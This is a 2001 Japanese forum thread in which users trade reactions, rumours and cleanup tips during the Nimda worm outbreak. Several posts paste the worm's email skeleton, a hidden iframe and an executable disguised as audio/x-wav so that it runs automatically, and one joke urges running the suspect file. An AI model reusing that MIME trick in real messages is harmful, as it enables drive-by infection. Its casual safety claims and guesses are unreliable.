:01/09/19 01:14 ID:xl/0vm/6
1のアドレスを踏んでしまったらアウトですか?
227 :
p :01/09/19 01:14 ID:se4vaVZI
>>187 emlやってみましたが 何も見つからなかったです。大丈夫なのかな。 2チャン初めて書きこみしたんだけど みんなやさしくって良かった。
228 :
:01/09/19 01:14 ID:8oVJNRd2
1.鯖に対して何をするのか。 2.readme.exeが端末に対して何をするのか。
229 :
:01/09/19 01:15 ID:N4U8iOCw
>>214 漏れなんて小泉首相からメール来るんだぞ〜・・・・・・ハハハ・・・ハァ・・・
230 :
155 :01/09/19 01:15 ID:gzbyfssc
( ´Д`)y──┛~~メールは来てないけど、*.eml で検索したら Mvqkj05d.emltってOEのメールが出てきた
232 :
:01/09/19 01:15 ID:qABiaKq.
233 :
1 :01/09/19 01:15 ID:2tV4oiIM
これを書き込んだときと同時に1とほぼ同じ内容のメールをMSNに送っといたけど返事ないな。
234 :
:01/09/19 01:16 ID:1QJIZcaI
>>226 readme.exeファイルが自分のHDDに無ければ大丈夫と思われ・・
235 :
´_ゝ` :01/09/19 01:16 ID:FjGG5kz2
| /⌒彡 ゴーーーー | / 冫、) | / ` / | / / みんなの心に感謝します〜 | @─@
236 :
1 :01/09/19 01:17 ID:2tV4oiIM
>233 これ→このスレ
237 :
:01/09/19 01:18 ID:Gpvomf.g
世界規模で増殖中です ← マジ かなりやばそうです テロ関連かわかりませんが明日のニュースを賑わすでしょう
238 :
emlファイル ありました。 :01/09/19 01:18 ID:CpVmg70M
239 :
ん〜ま :01/09/19 01:18 ID:TWLvHZ.k
祭りだあ!!祭りだあ!!祭りだあ!!
240 :
:01/09/19 01:18 ID:wAijURv.
241 :
:01/09/19 01:18 ID:3bHsufFg
242 :
:01/09/19 01:19 ID:8oVJNRd2
emlファイルが数千単位で大増殖するという報告があるから HDDが普段と違ってやたらガリガリ言ってる人とかは要注意。
243 :
まゆみたん :01/09/19 01:19 ID:.4/So/vI
秀ちゃん見てる?
244 :
ん〜ま :01/09/19 01:19 ID:TWLvHZ.k
気にするな!ワシもだ!!w
>>240 ( ´Д`)y──┛~~モレモナー トロメールしかこない(w
246 :
:01/09/19 01:20 ID:ikL1dm5.
emlファイルが1つだけあるんですが大丈夫ですか?
247 :
:01/09/19 01:21 ID:qABiaKq.
240も241もみんな友達だ!!
248 :
p :01/09/19 01:21 ID:se4vaVZI
>>242 HDDって?ウィーンってやつですか?
249 :
:01/09/19 01:21 ID:N4U8iOCw
>>246 実行してみたら?
もし、ウイルスだったら汚いから近寄らないでね彡☆
250 :
:01/09/19 01:22 ID:sXaJfZYE
251 :
ななし :01/09/19 01:22 ID:yePMEpJw
うちのサイトにも
>>173 みたいなアタックが・・・
ほとんど216.*.*.*だが。メンテができねー。
tcupの本体と一部サーバーが氏んでいるのはこのせいか?
252 :
明日・・・・ :01/09/19 01:23 ID:1QJIZcaI
もし、インターネットにつながらなかったり、非常に遅くなっていたりしても ISPや自社のネット管理者をいじめない様に! インターネット上に異常なトラフィックが増えまくっているので。 CodeRedのログが隠れてしまうくらいに、新種のログが・・・・
253 :
:01/09/19 01:23 ID:2tV4oiIM
50megs.comから16通ほどメールが来た( ´Д`)y──┛~
254 :
:01/09/19 01:23 ID:rkXvUCbU
おいらもZA反応しまくってる。。。。。その先に飛んだら、DLのダイアログが立ち上がった。。。(;´Д`)
255 :
あや :01/09/19 01:24 ID:YzSJvEo2
256 :
獣精 名無しさん :01/09/19 01:24 ID:UvhSv40A
257 :
:01/09/19 01:24 ID:s/F3aidE
ここに「メール来ない大同盟」が結成された模様。
258 :
:01/09/19 01:25 ID:P2Rw92t6
( ´Д`)y──┛~~emlファイルネスケのキャッシュにあったよ
260 :
:01/09/19 01:26 ID:Qb3w7wGo
俺なんかNBCiから600通のメールボムくらったぞ
261 :
´_ゝ` :01/09/19 01:27 ID:FjGG5kz2
>>254 ∧∧ どうしようかねえ・・・。
(;=゚ω゚)ノ
〜(⊃OO
263 :
:01/09/19 01:27 ID:1qCVev.E
便乗テロの可能性あり
264 :
ん〜ま :01/09/19 01:28 ID:TWLvHZ.k
265 :
:01/09/19 01:28 ID:N4U8iOCw
266 :
:01/09/19 01:28 ID:qABiaKq.
260はMVP
267 :
:01/09/19 01:28 ID:8oVJNRd2
今回のはNimdaと命名された模様…。
268 :
:01/09/19 01:28 ID:XgWFSkd.
269 :
あ :01/09/19 01:29 ID:Q4OBhmVU
270 :
:01/09/19 01:29 ID:sXaJfZYE
>>254 ここ↓?
216.**.**.**
63.**.**.*
271 :
_ :01/09/19 01:29 ID:r.8d659M
*.emlってファイル検索の名前に入れるんですか? それとも、含まれる文字列の方ですか?
272 :
:01/09/19 01:30 ID:KLLLh/gg
>>242 それ、俺。
アイコンはアウトルックや、MS_エクソチェンジのメールの形だ<*.eml
(*.msgと同じやつね)
273 :
:01/09/19 01:31 ID:qABiaKq.
274 :
:01/09/19 01:32 ID:rkXvUCbU
275 :
:01/09/19 01:32 ID:N4U8iOCw
276 :
:01/09/19 01:34 ID:Brk2phHg
>>210 のとこのemlファイルふんでみたけど大丈夫だった。
たぶん、IE5.5SP2入れてるなら大丈夫じゃないかな。
みんな入れてる?
277 :
:01/09/19 01:35 ID:P2Rw92t6
しっかし、このリダイレクト用サーバー、以前にもクラック 受けてなかったっけ? だれか、覚えていませんか?
278 :
214 :01/09/19 01:35 ID:Ey4CFa8M
やぱり、メールきません。。。 みんな、なかよくしようよ。
\Windows\TempファイルにへんなmepE280.tmp.exeというファイルがいて、 何か送ろうとしている。(\NortonInernetSecurityで遮断中) 別にIISも利用していない普通のWin98. 木馬か?
280 :
:01/09/19 01:36 ID:1QJIZcaI
symantecのサイトの情報だと、このワームの動きは、 1.readme.exeを添付したメールを出す。 2.C:ドライブに共有設定をする まあ、余り凶悪なヤツではないようだ。
281 :
_ :01/09/19 01:36 ID:r.8d659M
282 :
:01/09/19 01:37 ID:qABiaKq.
283 :
214 :01/09/19 01:38 ID:Ey4CFa8M
>>282 ありがと。。。
歌おう!!みんなで歌おう!!それっ
「ぼっくらは〜みんな〜いきている〜
いき〜ているから、さみしんだ。。。」
284 :
:01/09/19 01:39 ID:Qb3w7wGo
俺だって差出人が個人名のメールは来ないさ・・・
285 :
282 :01/09/19 01:40 ID:qABiaKq.
>>214 うたっちゃダメ〜。
・・・・・・・・・・・・・泣いちゃうでしょ・
286 :
開いてしまったが・・・ :01/09/19 01:41 ID:f4YGPbVA
MSN開いたら、真っ白なページが出たんで すぐに閉じたんですが・・・ コレはやばいのでしょうか??? *.emlで検索したらOEのファイルが一つ・・・。 誰かマジレスください、お願いします。
287 :
214 :01/09/19 01:42 ID:Ey4CFa8M
・・・、 そして、、、ここでも、、ともだちを失った。。。
288 :
緊急 :01/09/19 01:42 ID:.fmc8UKU
289 :
ごめんなさい :01/09/19 01:42 ID:sFclSUNE
このスレがほとんど意味わかんない僕は
とりあえず
>>205 でいいんですよね?
291 :
ビソ・ラディンの友人 :01/09/19 01:44 ID:N4U8iOCw
>>287 2chで友達を作る事は WTCビルを破壊する事より難しい byひろ○き
292 :
282 :01/09/19 01:44 ID:qABiaKq.
>>214 違う!違うのよ。・・・ただ歌ったら涙が・・・・・
私たちは友達よ!!
293 :
yyyy :01/09/19 01:44 ID:h3dmLZNw
Netscapeはみれない IEをインストールしろ というがめんがでた さすが 世界のMICROSOFT
294 :
128 :01/09/19 01:45 ID:KLLLh/gg
>286 テキストエディタで開いて、つぎのような感じなら即削除っす。 <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
295 :
:01/09/19 01:45 ID:wrcU3qAs
296 :
:01/09/19 01:45 ID:1QJIZcaI
>>286 readme.emlやreadme.exeファイルがあったら削除して、
マシンを再起動せよ。
297 :
:01/09/19 01:46 ID:sf/A3N6g
俺はメール来たぜ、12通・・・・・・・・・・・・・・・・・・・・メルマガと広告じゃなーか・・・。
>>286 ( ´Д`)y──┛~~オレも同じだったが、キャッシュの削除
emlファイルをtxtに名前変えて保存しといたよ
299 :
214 :01/09/19 01:46 ID:Ey4CFa8M
>>290 それでも、こんな悲しいことがあるらしい↓
過日、8月27日・28日・29日・30日にサーバーの不具合が発生し
一部の登録者の皆様にメールが届かないという事態がおこりました。
現在は復旧しておりますが、メールが届かなかった皆様には
御迷惑をお掛けしましたことをお詫び申し上げます
300 :
:01/09/19 01:46 ID:rkXvUCbU
まあ、いいさ!俺はメルマガ毎日たくさん届くし。ヽ(´ー`)ノ
301 :
293 :01/09/19 01:46 ID:h3dmLZNw
参考までに Microsoftについて 面白く批判しているのは↓ tp://www.asahi-net.or.jp/~FV6N-TNSK/gates/
302 :
:01/09/19 01:46 ID:1QJIZcaI
303 :
:01/09/19 01:47 ID:KFI1bVoI
また、MSNのページおかしくなってない?
304 :
286 :01/09/19 01:47 ID:f4YGPbVA
>>294 ありがとうございます。
でも初心者なのでテキストエディタで開くというのがわかりません。
どうしたらいいのでしょう?
305 :
. :01/09/19 01:47 ID:S35nvYBE
306 :
>293 :01/09/19 01:48 ID:KLLLh/gg
とのさきさんっすね。懐かしい。
307 :
214 :01/09/19 01:48 ID:Ey4CFa8M
>>284 ありがとう。。。
うんっ、わかたよ。もう、悲しい歌はうたわない!!
わらおう!!みんあでわらおう!!
あひゃひゃひゃひゃひゃ〜〜〜〜
おっへ〜うおっうおっおうっ。。。。
うあ〜ん。。。
>>299 ( ´Д`)y──┛~~よくあることだったり・・・(w
登録して半年も経つと内容がタブったメールが何通か・・・・
309 :
a :01/09/19 01:49 ID:FJNlz/zY
ん?今msn開いたけどなんともないぞ?
310 :
:01/09/19 01:49 ID:2tV4oiIM
311 :
284 :01/09/19 01:50 ID:qABiaKq.
>>214 yひひひひひひひいひひひひひいいいいいいいい・・・
>>304 ( ´Д`)y──┛~~メモ帳開いて、検索したファイルをドラッグ&ドロップすればよいと思われ
313 :
:01/09/19 01:51 ID:KFI1bVoI
314 :
:01/09/19 01:51 ID:p1/RHo/s
すいません。ダウンロードして実行してみました。開くことができませんしてた。 結局なんだったんですか?
315 :
ブッシュ :01/09/19 01:52 ID:.5dXweHY
これはテロを越えた戦争行為です
316 :
:01/09/19 01:52 ID:Qb3w7wGo
おおおおお ページ開けなかったから大丈夫だと思ったけど一応検索したら readme.emlとreadme(1).emlあるじゃねえかあああああ びっくり
317 :
214 :01/09/19 01:52 ID:Ey4CFa8M
318 :
:01/09/19 01:52 ID:sXaJfZYE
319 :
238 :01/09/19 01:53 ID:CpVmg70M
>>214 俺もいるぜ!
くるのは、週に一回総理大臣からの親書のみ!
320 :
_ :01/09/19 01:54 ID:yePMEpJw
>>314 ログ見れ。
得体の知れないものをそのまま開くんじゃない。
自信がないなら何もしないのが一番。
対策されたのか。 さっき繋いだけどなんともなくてちょっと残念。
322 :
:01/09/19 01:54 ID:45EAcHAA
おのれラディソめ
323 :
うんこ :01/09/19 01:54 ID:m7JkBpaw
324 :
:01/09/19 01:55 ID:N4U8iOCw
>>319 漏れと同じだな(w
後は、サーバーからの連絡と、アコムからのメールだけだ・・・
325 :
:01/09/19 01:55 ID:XgWFSkd.
すいません。 MSNでサーチは危険ですか?
326 :
:01/09/19 01:55 ID:Qb3w7wGo
MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p>
327 :
214 :01/09/19 01:56 ID:Ey4CFa8M
ひ○ゆきなんてうそつきだ〜!! やさしい友がたくさんできたじゃないか〜 さあ歌え!!歌おうよ!! 「きっさまとおれ〜と〜あ、どおきのさくら〜」 「まいにちちぇ〜くっ してるのに、新着はな〜い〜」 それっ!!
328 :
:01/09/19 01:56 ID:rkXvUCbU
330 :
:01/09/19 01:57 ID:sXaJfZYE
>>324 ( ´Д`)y──┛~~催促のメールか?(w
332 :
303 :01/09/19 01:58 ID:KFI1bVoI
Windows2000だけど、さっきMSN見た瞬間に、 IExplorerとexplorerが応答無しになった。 結局一度ログオフして再びMSN見にいったら、その時はもう正常に戻ってた。 新種のブラクラかと思った。
333 :
:01/09/19 01:58 ID:qABiaKq.
334 :
:01/09/19 01:58 ID:45EAcHAA
335 :
:01/09/19 01:58 ID:p1/RHo/s
ウィルススキャンしても大丈夫だから実行したんですよ(泣
336 :
:01/09/19 01:59 ID:XgWFSkd.
MSNサーチもダメ?
337 :
:01/09/19 02:00 ID:XTAHDm5.
338 :
:01/09/19 02:01 ID:.fmc8UKU
339 :
:01/09/19 02:01 ID:sXaJfZYE
340 :
238 :01/09/19 02:02 ID:CpVmg70M
>>214 もう止めようよ…
メールもこない、ケータイもならない。
寂しいよね…
341 :
? :01/09/19 02:03 ID:btHb6sxc
Proxomitron 使ってると PostScript Killed でやばいスクリプトが消されてる。
342 :
214 :01/09/19 02:04 ID:Ey4CFa8M
>>238 けっケータイ。。。。
悲しい現実をもうひとつ、思い出した。。
343 :
ななし :01/09/19 02:05 ID:yePMEpJw
>>335 ウィルススキャンは魔法の箱じゃないから、「自分が知らないものはわからない」。
明日あたりにはパターンファイル、ワクチンができてるだろうけど。
気を付けてね。
(責める気はないんだよ)
344 :
:01/09/19 02:05 ID:qABiaKq.
345 :
:01/09/19 02:05 ID:N4U8iOCw
346 :
:01/09/19 02:05 ID:XTAHDm5.
新種は出てこないだろ・・・
347 :
:01/09/19 02:06 ID:jWTibOpk
>>342 俺、実家の母親からしか掛かってこない(;´Д`)
348 :
:01/09/19 02:07 ID:qABiaKq.
>>347 親からなんて年に3回くらいだな。
自分からもほとんどしない。
349 :
:01/09/19 02:08 ID:sXaJfZYE
>>344 〜347
つかもう、ウイルスなんてどうでもいいのね (w
350 :
214 :01/09/19 02:08 ID:Ey4CFa8M
>>344 なぜ、、なぜ、おいらを慰める。。?
みんな淋しいんじゃないか〜〜〜!!
もう、、だれも一人にはしないさ(キラッ☆涙。。
351 :
:01/09/19 02:08 ID:gJIc7Y16
このファイル、うちにはメールに添付された。
もち、開かなかったけど。
eturn-Path: <
[email protected] >
Received: from WANGPL ([141.213.194.139]) by ****.****.**.jp with SMTP
id <20010918150516.GKYY27680.****.****.**.jp@WANGPL>
for <****@****.**.jp>; Wed, 19 Sep 2001 00:05:16 +0900
From: <
[email protected] >
Subject: ucommon appcmu personal evaluation1columbia app from applycollege stuff backupnew colmbia
appbuddylist2computer sciences essaythird day - love songmatt redman -
13 let my words be fewcmu personal evaluationcornell appriched20checklistriched20eph4letter
to ***.****.**.jp.cmu personal evaluation
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <20010918150516.GKYY27680.****.****.**.jp@WANGPL>
Date: Wed, 19 Sep 2001 00:05:19 +0900
352 :
:01/09/19 02:08 ID:s/F3aidE
>>343 ヒューリスティックスキャン(だっけ?)っていうのは当てにならないの?
353 :
214 :01/09/19 02:09 ID:Ey4CFa8M
>>350 だって〜、知らせる友がいないだも〜んっ
あひゃひゃ〜〜っ
354 :
:01/09/19 02:10 ID:1QJIZcaI
今回のreadme.exeは9/18にハケーンされた新種のワームなので、現時点では ウィルスチェックソフトで検出出来ないZO。 怪しいEXEは絶対実行すべきではない!
355 :
238 :01/09/19 02:10 ID:CpVmg70M
>>214 ごめん!思い出させて…
俺のケータイって、メールできないから
迷惑メールすらこないんだよね…
356 :
214 :01/09/19 02:10 ID:Ey4CFa8M
350→349 お詫びして訂正します。
357 :
:01/09/19 02:11 ID:XEQy4XiQ
test
358 :
:01/09/19 02:11 ID:KFI1bVoI
関係者以外立入禁止。
359 :
:01/09/19 02:12 ID:sFclSUNE
さ、さすが速報板。 大半の人がウィルスの話をしていない、、、
360 :
名無しさん :01/09/19 02:12 ID:.z6DCC0s
私だけじゃなかったのか。
361 :
:01/09/19 02:12 ID:qABiaKq.
214は丁寧だね。やっぱり友達だ!
362 :
:01/09/19 02:12 ID:rkXvUCbU
MSNは未だにダンマリだな。(-。- )ボショ
363 :
:01/09/19 02:13 ID:sXaJfZYE
30分でZA25回反応してるんですけど・・・
364 :
214 :01/09/19 02:14 ID:Ey4CFa8M
>>238 おいら、、あんた好きだよ。ホント好きだよ。
おいらのケータイもメールできん。
まわりで鳴るんだよね、「あっメールっ」とかいって、
楽しそうに見てるんだ。
おいらは、その脇で、タバコふかすしかねえんだよ。
灰色の小さなケータイの画面見ながら。。
もち、ストラップはふつ〜の。
365 :
:01/09/19 02:14 ID:KFI1bVoI
366 :
ななし :01/09/19 02:14 ID:yePMEpJw
>>343 (ちょっと逃げモード)
「このファイルはウィルスの可能性がある」と言うことは分かるだろうけど、
「このファイルはウィルスの可能性が絶対ない」と断言はできないと思う。
だから得体の知れないファイルは開かない。
367 :
:01/09/19 02:15 ID:8oVJNRd2
MSNは今頃、鯖缶が携帯で叩き起こされて 眠い目をこすりながらtelnet中と思われ。
368 :
:01/09/19 02:16 ID:l3W.pccI
>>363 折れも今日はやけにぞぬが反応するなぁと思ってた。
明日朝から会社のパソコン動き出したらもっと凄いことになりそう。
369 :
:01/09/19 02:17 ID:1QJIZcaI
笹塚のビルは今日も明かりが消えないのか・・・
>>367 てことは、トレンドマイクロは赤いサイレンか?
( ´Д`)y──┛~~オレも携帯メールできないよ、ちなみに携帯鳴るの月に5回くらい(ボソッ
371 :
:01/09/19 02:18 ID:rkXvUCbU
いろんな所を回ってたら、カルーセル麻紀逮捕って・・・・いやぁ、バンバン捕まりますな。ヽ(´ー`)ノ
372 :
:01/09/19 02:18 ID:sXaJfZYE
>>365 DLされた形跡は無いんだけど
323のリンクのチンのサイトの
これが気になる
うぃん98!!
鞭唹・議狼由:
Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows 2000
Microsoft Internet Explorer 5.0
+ Microsoft Windows 98
音鞭唹・狼由:
Microsoft Internet Explorer 5.0.1SP2
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows 2000
373 :
:01/09/19 02:18 ID:.fmc8UKU
今日のトップニュース 更新 09/19/2001 02:05 のんきに更新しているな。 今日のトップニュースはMSNがウィルスに感染したことだ。
374 :
:01/09/19 02:20 ID:Gpvomf.g
このウィルスに感染しちゃったPCがreadme.exeの発信地になるみたいです 送信するパケットはセキュリティーホールを一通りつつくので管理の悪いサーバは落ちます 現時点でメールフィルタにひっかからないので 朝になって感染が広がるとトラフィックが上がってこれもやばいです 以上
375 :
:01/09/19 02:21 ID:s/F3aidE
>>366 なるほど、とにかく気をつけるに越したことはないと。
376 :
_ :01/09/19 02:21 ID:d47oHHig
これって、HP開くとreademe.emlに飛ばされて、readme.exeが勝手に実行されちゃうんですか??
377 :
:01/09/19 02:21 ID:45EAcHAA
>>371 いや本当に最近いろいろな事が起きるね・・・
毎日が祭りだアヒャ
378 :
:01/09/19 02:23 ID:Qb3w7wGo
既に2chが重くなってきた気がする・・・気のせいか?
379 :
128 :01/09/19 02:23 ID:KLLLh/gg
を、一応、emlファイル検索かけて全て削除しreadme.exeも削除したけど、 いま、またHDDが騒ぎ出した。FDDにもアクセスする。
380 :
_ :01/09/19 02:23 ID:lABSydVE
381 :
:01/09/19 02:24 ID:XR0poH9A
すいません、read.meファイルを実行したらマシンがダウソして 煙が出てきたんですが俺の頭大丈夫デスカ?
382 :
:01/09/19 02:24 ID:XTAHDm5.
重い
383 :
:01/09/19 02:25 ID:sXaJfZYE
63.209.161.60 ここってマイクロソフツか? ここにもあるんだが どうしよう
384 :
:01/09/19 02:25 ID:KFI1bVoI
この件とは関係ないと思うのだが、 ニュー速の鯖がちょっと重たくなってきた。
385 :
:01/09/19 02:25 ID:1QJIZcaI
386 :
:01/09/19 02:25 ID:wa4oCftU
MSNでウィルスだもんなぁ。 そろそろセキュリティの事考えないといかんなぁ。 俺ウィルス検知ソフトすらいれてねーよ。
387 :
? :01/09/19 02:26 ID:6z9Ue.ek
ログ見ようとしてCドライブ開いたら、いつのまにか Cm_error.txtなるものがあるんですが これ、なんですか?
388 :
:01/09/19 02:26 ID:l3W.pccI
うん、本当に重くなってきた。ぞぬもあいかわらずうるさく検知してる。 明日もしかしたら本当に大騒ぎかも。
389 :
:01/09/19 02:27 ID:sXaJfZYE
ZA34回突破 (;´Д`)
390 :
214 :01/09/19 02:28 ID:Ey4CFa8M
ほんとだ、鯖重い。。すごい時間かかる。 悲しみも一段と重い
392 :
:01/09/19 02:28 ID:KFI1bVoI
ニュー速の鯖以外も重たくなってるの?
393 :
:01/09/19 02:29 ID:45EAcHAA
これは狂牛病です。
394 :
:01/09/19 02:29 ID:XR0poH9A
すいません、 msnって何の略ですか?
395 :
:01/09/19 02:29 ID:XTAHDm5.
>>379 エクスプローラで「保護されたオペレーティングシステムファイルを表示しない」
のチェックをはずしてもっかいファイル検索してみ。
検索条件は「今日作成されたファイル」で。
変なexeが SuperHidden属性で作られてるから。
398 :
? :01/09/19 02:31 ID:6z9Ue.ek
ZAも2時間半で120回突破!
399 :
:01/09/19 02:32 ID:P2Rw92t6
400 :
:01/09/19 02:33 ID:Qb3w7wGo
質問ですが readme.emlは今のところ害なし? 消したいけどアクセスできなくて消せない 再起動したら活動開始 とかないよね・・・?
401 :
:01/09/19 02:34 ID:ZkO09kPw
すぐにワクチンってできるものなんですか? 除去できますかね?
402 :
:01/09/19 02:34 ID:N4U8iOCw
糞スレを立てまくってるから重いんじゃないかい?
403 :
:01/09/19 02:35 ID:eiodJYMI
>消したいけどアクセスできなくて消せない どういうことだ? 読み取り属性?
404 :
238 :01/09/19 02:35 ID:CpVmg70M
>>214 遅レス スマム
俺も、貴方を気に入った!
そうだよね!みーんなケータイでメールなんかしちゃって。
俺もメール打ってる奴らの横でタバコ(KENT)ふかしてる。
ちなみに、車を運転しながらメール打って、ちんたらしてる奴には
クラクション&パッシングのあらしです。
俺たち、ケコーンスル?
405 :
:01/09/19 02:36 ID:eiodJYMI
406 :
玉露入り :01/09/19 02:36 ID:okmjnOBQ
マカー・スーパー・ニセ 逆から読んでね。はーと
407 :
:01/09/19 02:37 ID:8oVJNRd2
おでんユーザ居る? POP鯖に繋がりにくくない?
408 :
:01/09/19 02:37 ID:KFI1bVoI
>>400 使用中で消せないの?
だったら、回復コンソールで消せるんじゃないかな?
409 :
:01/09/19 02:37 ID:bi15wNtM
IE5.01でもSP2入れてれば大丈夫なんだよね? とりあえず*.emlもreadme.exeもなかった。
410 :
_ :01/09/19 02:39 ID:lABSydVE
>>407 おでんだが、なにか?
・・・じゃなくって、POP鯖ってなんですか?
教えてチャンでゴメソ
411 :
:01/09/19 02:38 ID:bi15wNtM
IE5.01でもSP2入れてれば大丈夫なんだよね? とりあえず*.emlもreadme.exeもなかった。
412 :
:01/09/19 02:40 ID:ScvyITEw
サイバーテロだ! ι(゜∀゜)ノ サイバーテロだ! ι(゜∀゜)ノ サイバーテロだ! ι(゜∀゜)ノ
413 :
214 :01/09/19 02:40 ID:Ey4CFa8M
414 :
:01/09/19 02:40 ID:8oVJNRd2
>>410 メール受信に使うサーバ。
メール受信、普通に出来てる?
415 :
:01/09/19 02:41 ID:45EAcHAA
サイバーミニスカポリス出動!
416 :
214 :01/09/19 02:42 ID:Ey4CFa8M
改めて、、
>>238 早漏ですまぬ。
おいらは、おとこじゃ。
モホの気もないではない。
417 :
410 :01/09/19 02:43 ID:lABSydVE
>>414 ありがとう。
大丈夫みたい。今,1通受信できたし。
繋がりにくいってこともなかったよ。
418 :
:01/09/19 02:43 ID:KFI1bVoI
関係者以外立入禁止!!
419 :
:01/09/19 02:44 ID:Qb3w7wGo
遅くなったゴメンね
>>403 ライトプロテクトとか 使用中に出るやつね
>>408 回復コンソールってwin2000じゃなくてもある?オレ98
てかsafemodeだったら大丈夫だよね?
420 :
:01/09/19 02:45 ID:WCIFwurw
421 :
238 :01/09/19 02:45 ID:CpVmg70M
>>214 >モホの気もないではない。
ワラ ますます気に入った!!!
422 :
:01/09/19 02:45 ID:U3vLTHtQ
半日ウィルスはHPのサーバーに潜み、 マイクロソフト社のインターネット閲覧ソフト「IE」を通じて 被害を広げる。ウイルスの仕組まれたHPを見ると、有害 プログラムが動きだし、パソコンのシステムを改ざんする。 流行ってるらしい・・・。
423 :
:01/09/19 02:46 ID:qABiaKq.
214と238は面白い
424 :
できるGOO :01/09/19 02:47 ID:PlLXxDpE
単なるシステムエラーだろ。代わりに表示や MSNサーチのスピードが上昇した気がする。天下のマイクロソフトのファイヤー ウォールを潜り抜けるハッカーは、菅井きんしかいないって(笑。
425 :
:01/09/19 02:47 ID:4OHpNOJg
422 半日 × 反日 ○
426 :
:01/09/19 02:48 ID:8oVJNRd2
>>417 情報さんくす。
>>422 どこの新聞記者が書いた記事?
rhymeさんに突っ込み入れて欲しい記事だな。(笑)
427 :
214 :01/09/19 02:49 ID:Ey4CFa8M
きちょ〜な、友を失わぬために一応言っときますが、 あの、そろそろ、冷たい布団に入らせていただきます。 それでは、また、どこかで、、、
428 :
_ :01/09/19 02:50 ID:T.W/lyRg
429 :
:01/09/19 02:51 ID:qABiaKq.
430 :
238 :01/09/19 02:52 ID:CpVmg70M
>>214 俺も寝ます。おやすみ…
また何処かで会おうね
>>423 ありがとう!
>>ALL マジでレスしてる人たちごめんなさい。
431 :
ALLの一人 :01/09/19 02:54 ID:WCIFwurw
432 :
214 :01/09/19 02:57 ID:Ey4CFa8M
>>238 さすが、気が利く、やはり友だあ。
マジレスさんたち、ごめんなさい。
感染したおいら(変化はない。もちろんメ〜ルもない)は、
あしたから、また、「新着メッセージはありません」の言葉を
唯一のメールと思いこみ生きていきます。
おやすみなさい。
433 :
:01/09/19 03:03 ID:ZkO09kPw
やっぱりコンピューターはもう買い換えしなくてはならないのですかね(TT)
434 :
:01/09/19 03:04 ID:mkIz7Fiw
435 :
ぺ :01/09/19 03:05 ID:EGLNsppk
いや〜折れんところのサーバにも怪しいパケットがいっぱいくるわ。 韓国のいろんなIISサーバからwww connectionの連アタがよくくるんだけど、 相手に行ったらreadme.exe発見♪
436 :
:01/09/19 03:06 ID:WCIFwurw
なんかZAも静かになったし バックアップとって寝るかー
437 :
:01/09/19 03:07 ID:rkXvUCbU
>>434 ずいぶん古いネタを持ち出してきたな・・・・
438 :
:01/09/19 03:08 ID:ZkO09kPw
全部フォーマットすれば問題ないですかね? また入れなおしか・・・・。
439 :
:01/09/19 03:09 ID:NRln1zEY
440 :
ぺ :01/09/19 03:09 ID:EGLNsppk
てか何でIISなんて使うんだろう。 怖いわ〜
441 :
:01/09/19 03:09 ID:8oVJNRd2
>>438 早まるな。
明日になれば復旧方法も出てくるから。
442 :
_ :01/09/19 03:10 ID:lABSydVE
皆さん,サーバーがどうとか パケットがどうとか言っていますが 何のことなんでしょうか?教えてください。
443 :
:01/09/19 03:10 ID:.n3UUGT2
,: 三ニ三ミミ;、-、 \/  ̄ | --十 i 、.__/__ \ , ____|__l l ー十 xX'' `YY"゙ミ、 ∠=ー  ̄ヽ | __|. | | / ヽ / __| ,二i ̄ 彡" ..______. ミ. (___ ノ. | (__i゙'' し ノ /^ヽ_ノ (__ (__ ::::: ::; ,=ミ______=三ミ ji,=三ミi i 、'ーーー|,<(・)>|=|<(・)>| ,-v-、 i; ':: ::: ーー" ゙i ,ーー'j / _ノ_ノ:^) ーi:: ::i: /`^ー゙`、_ ..i / _ノ_ノ_ノ /) |:::. ゙"i _,,.-==-、;゙゙i / ノ ノノ// 〉::.:.. 丶 " ゙̄ .'.ノ ____ / ______ ノ / i, `ー-、.,____,___ノ\____(" `ー" 、 ノ ー'/ 'i. ヽ、 ,二ニ/ \ ``ー-、 ゙ ノ / 'i、 /\ / > ( `ー''"ー'" \ 'i," (__) / / \ /ノ
444 :
ペ :01/09/19 03:14 ID:EGLNsppk
サーバ管理者以外にはあんま気にしなくていいんじゃない?
445 :
:01/09/19 03:15 ID:iaQQZmng
悪意ある Javaスクリプト実行による被害情報・・・ 数日前、2ch世界になぐりこみ とかいうスレの 1 に書いてあった URLにアクセスした君、PCおかしくなったでしょ。 悪意には悪意をもって報復されたのです。 ざーめん。
446 :
:01/09/19 03:16 ID:oUaC2C3w
タイミング良くヤフーから壊れたメールが送られてきたよ。 プレビューするだけでアウトルックが強制修了する。 削除したけど大丈夫かな。
447 :
なるほど! :01/09/19 03:17 ID:lABSydVE
>>444 そうなのかぁ!ありがとうございます。
ってことは、ココってやっぱり色んな方が
来てるんですね・・・。
448 :
:01/09/19 03:20 ID:vHTlQvaQ
>>447 readme.exeはWinユーザなら誰しもが感染するぞ。
449 :
_ :01/09/19 03:22 ID:lABSydVE
450 :
